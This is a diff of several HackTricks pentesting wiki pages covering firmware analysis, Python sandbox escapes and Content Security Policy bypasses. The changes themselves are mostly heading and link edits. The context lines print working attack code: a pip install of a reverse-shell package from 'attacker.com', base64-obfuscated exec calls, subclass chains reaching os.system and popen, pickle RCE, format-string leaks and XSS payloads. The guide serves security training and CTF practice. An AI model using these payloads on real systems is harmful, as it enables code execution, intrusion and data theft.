file bin/busybox file bin/busybox
@ -245,7 +244,7 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0 1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0
``` ```
## Full System Emulation ### Full System Emulation
There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware: There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware:
@ -257,7 +256,7 @@ There are several tools, based in **qemu** in general, that will allow you to em
* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) * [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)
* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) * [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool)
# **Dynamic analysis** ## **Dynamic analysis**
In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**. In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**.
@ -283,7 +282,7 @@ You should test if the device is doing any kind of **firmware integrity tests**,
Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications. Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications.
# **Runtime analysis** ## **Runtime analysis**
Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below: Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below:
@ -305,7 +304,7 @@ Tools that may be helpful are (non-exhaustive):
* Binary Ninja * Binary Ninja
* Hopper * Hopper
# **Binary Exploitation** ## **Binary Exploitation**
After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory. After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory.
@ -316,12 +315,12 @@ Utilize the following references for further guidance:
* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/) * [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/)
* [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/) * [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
# Prepared OSs to analyze Firmware ## Prepared OSs to analyze Firmware
* [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. * [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded.
* [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. * [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools.
# Vulnerable firmware to practice ## Vulnerable firmware to practice
To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point. To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point.
@ -338,16 +337,15 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
* Damn Vulnerable IoT Device (DVID) * Damn Vulnerable IoT Device (DVID)
* [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID) * [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
# References ## References
* [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) * [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904) * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
# Trainning and Cert ## Trainning and Cert
* [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation) * [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -363,5 +361,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Bypass Python sandboxes
<details> <details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
These are some tricks to bypass python sandbox protections and execute arbitrary commands. These are some tricks to bypass python sandbox protections and execute arbitrary commands.
# Command Execution Libraries ## Command Execution Libraries
The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries: The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
@ -66,9 +65,9 @@ Python try to **load libraries from the current directory first** (the following
![](<../../../.gitbook/assets/image (552).png>) ![](<../../../.gitbook/assets/image (552).png>)
# Bypass pickle sandbox with default installed python packages ## Bypass pickle sandbox with default installed python packages
## Default packages ### Default packages
You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\ You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\ Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
@ -89,7 +88,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0)))
For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
## Pip package ### Pip package
Trick shared by **@isHaacK** Trick shared by **@isHaacK**
@ -102,13 +101,13 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
{% file src="../../../.gitbook/assets/reverse.tar.gz" %} {% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
{% hint style="info" %} {% hint style="info" %}
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
{% endhint %} {% endhint %}
# Eval-ing python code ## Eval-ing python code
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction: This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
@ -133,7 +132,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
``` ```
# Builtins ## Builtins
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
@ -145,7 +144,7 @@ __builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls") __builtins__.__dict__['__import__']("os").system("ls")
``` ```
## No Builtins ### No Builtins
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\ When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**. However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
@ -175,7 +174,7 @@ import __builtin__
get_flag.__globals__['__builtins__']['__import__']("os").system("ls") get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
``` ```
### Python3 #### Python3
```python ```python
# Obtain builtins from a globally defined function # Obtain builtins from a globally defined function
@ -194,7 +193,7 @@ get_flag.__globals__['__builtins__']
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**. [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
### Python2 and Python3 #### Python2 and Python3
```python ```python
# Recover __builtins__ and make eveything easier # Recover __builtins__ and make eveything easier
@ -202,7 +201,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__
__builtins__["__import__"]('os').system('ls') __builtins__["__import__"]('os').system('ls')
``` ```
## Builtins payloads ### Builtins payloads
```python ```python
# Possible payloads once you have found the builtins # Possible payloads once you have found the builtins
@ -212,7 +211,7 @@ __builtins__["__import__"]('os').system('ls')
# See them below # See them below
``` ```
# Globals and locals ## Globals and locals
Checking the **`globals`** and **`locals`** is a good way to know what you can access. Checking the **`globals`** and **`locals`** is a good way to know what you can access.
@ -242,11 +241,11 @@ class_obj.__init__.__globals__
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**. [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
# Discover Arbitrary Execution ## Discover Arbitrary Execution
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits. Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
### Accessing subclasses with bypasses #### Accessing subclasses with bypasses
One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**: One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**:
@ -275,7 +274,7 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
``` ```
## Finding dangerous libraries loaded ### Finding dangerous libraries loaded
For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**: For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**:
@ -383,7 +382,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
""" """
``` ```
# Recursive Search of Builtins, Globals... ## Recursive Search of Builtins, Globals...
{% hint style="warning" %} {% hint style="warning" %}
This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.** This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.**
@ -511,7 +510,7 @@ You can check the output of this script in this page:
[output-searching-python-internals.md](output-searching-python-internals.md) [output-searching-python-internals.md](output-searching-python-internals.md)
{% endcontent-ref %} {% endcontent-ref %}
# Python Format String ## Python Format String
If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example. If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
@ -566,7 +565,7 @@ class HAL9000(object):
**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) **More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)
## Sensitive Information Disclosure Payloads ### Sensitive Information Disclosure Payloads
```python ```python
{whoami.__class__.__dict__} {whoami.__class__.__dict__}
@ -579,7 +578,7 @@ class HAL9000(object):
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
``` ```
# Dissecting Python Objects ## Dissecting Python Objects
{% hint style="info" %} {% hint style="info" %}
If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
@ -600,7 +599,7 @@ def get_flag(some_input):
return "Nope" return "Nope"
``` ```
### dir #### dir
```python ```python
dir() #General dir() to find what we have loaded dir() #General dir() to find what we have loaded
@ -609,7 +608,7 @@ dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
``` ```
### globals #### globals
`__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared: `__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
@ -624,7 +623,7 @@ CustomClassObject.__class__.__init__.__globals__
[**See here more places to obtain globals**](./#globals-and-locals) [**See here more places to obtain globals**](./#globals-and-locals)
## **Accessing the function code** ### **Accessing the function code**
**`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function. **`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function.
@ -642,7 +641,7 @@ dir(get_flag.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
``` ```
## Getting Code Information ### Getting Code Information
```python ```python
# Another example # Another example
@ -690,7 +689,7 @@ get_flag.__code__.co_code
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
``` ```
## **Disassembly a function** ### **Disassembly a function**
```python ```python
import dis import dis
@ -744,7 +743,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
47 RETURN_VALUE 47 RETURN_VALUE
``` ```
# Compiling Python ## Compiling Python
Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\ Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_) Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
@ -762,7 +761,7 @@ def get_flag(some_input):
return "Nope" return "Nope"
``` ```
## Creating the code object ### Creating the code object
First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked: First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked:
@ -795,7 +794,7 @@ types.CodeType.__doc__
``` ```
{% endhint %} {% endhint %}
## Recreating a leaked function ### Recreating a leaked function
{% hint style="warning" %} {% hint style="warning" %}
In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**. In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
@ -812,7 +811,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag #ThisIsTheFlag
``` ```
## Bypass Defenses ### Bypass Defenses
In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\ In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF). Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF).
@ -856,19 +855,19 @@ f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdi
f(42) f(42)
``` ```
# Decompiling Compiled Python ## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code. Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
**Check out this tutorial**: **Check out this tutorial**:
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} {% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) [.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %} {% endcontent-ref %}
# Misc Python ## Misc Python
## Assert ### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Therefore, checks like Therefore, checks like
@ -884,7 +883,7 @@ def check_permission(super_user):
will be bypassed will be bypassed
# References ## References
* [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
@ -893,7 +892,6 @@ will be bypassed
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -909,5 +907,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -202,7 +202,7 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/
python3 xamarin-decompress.py -o /path/to/decompressed/apk python3 xamarin-decompress.py -o /path/to/decompressed/apk
``` ```
and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs. and finally you can use [**these recommended tools**](../../group-1/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
### Automated Static Code Analysis ### Automated Static Code Analysis

View file

@ -1,4 +1,4 @@
# Content Security Policy (CSP) Bypass
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## What is CSP
# What is CSP
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:` Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
@ -35,12 +34,12 @@ Implemented via meta tag:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
``` ```
## Headers ### Headers
* `Content-Security-Policy` * `Content-Security-Policy`
* `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment). * `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment).
# Defining resources ## Defining resources
CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`. CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`.
@ -56,7 +55,7 @@ media-src https://videos.cdn.mozilla.net;
object-src 'none'; object-src 'none';
``` ```
## Directives ### Directives
* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. * **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution.
* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. * **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default.
@ -75,7 +74,7 @@ object-src 'none';
* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. * **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten.
* **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy. * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
## **Sources** ### **Sources**
* \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes * \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes
* **self**: This source defines that loading of resources on the page is allowed from the same domain. * **self**: This source defines that loading of resources on the page is allowed from the same domain.
@ -87,9 +86,9 @@ object-src 'none';
* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy. * **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy.
* **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash * **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash
# Unsafe Scenarios ## Unsafe Scenarios
## 'unsafe-inline' ### 'unsafe-inline'
```yaml ```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline'; Content-Security-Policy: script-src https://google.com 'unsafe-inline';
@ -97,13 +96,13 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
Working payload: `"/><script>alert(1);</script>` Working payload: `"/><script>alert(1);</script>`
### self + 'unsafe-inline' via Iframes #### self + 'unsafe-inline' via Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} {% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md) [csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
{% endcontent-ref %} {% endcontent-ref %}
## 'unsafe-eval' ### 'unsafe-eval'
```yaml ```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval'; Content-Security-Policy: script-src https://google.com 'unsafe-eval';
@ -111,7 +110,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-eval';
Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>` Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
## Wildcard ### Wildcard
```yaml ```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *; Content-Security-Policy: script-src 'self' https://google.com https: data *;
@ -124,7 +123,7 @@ Working payload:
"/>'><script src=data:text/javascript,alert(1337)></script> "/>'><script src=data:text/javascript,alert(1337)></script>
``` ```
## Lack of object-src and default-src ### Lack of object-src and default-src
```yaml ```yaml
Content-Security-Policy: script-src 'self' ; Content-Security-Policy: script-src 'self' ;
@ -138,7 +137,7 @@ Working payloads:
<param name="AllowScriptAccess" value="always"></object> <param name="AllowScriptAccess" value="always"></object>
``` ```
## File Upload + 'self' ### File Upload + 'self'
```yaml ```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ; Content-Security-Policy: script-src 'self'; object-src 'none' ;
@ -158,7 +157,7 @@ Moreover, even if you could upload a **JS code inside** a file using a extension
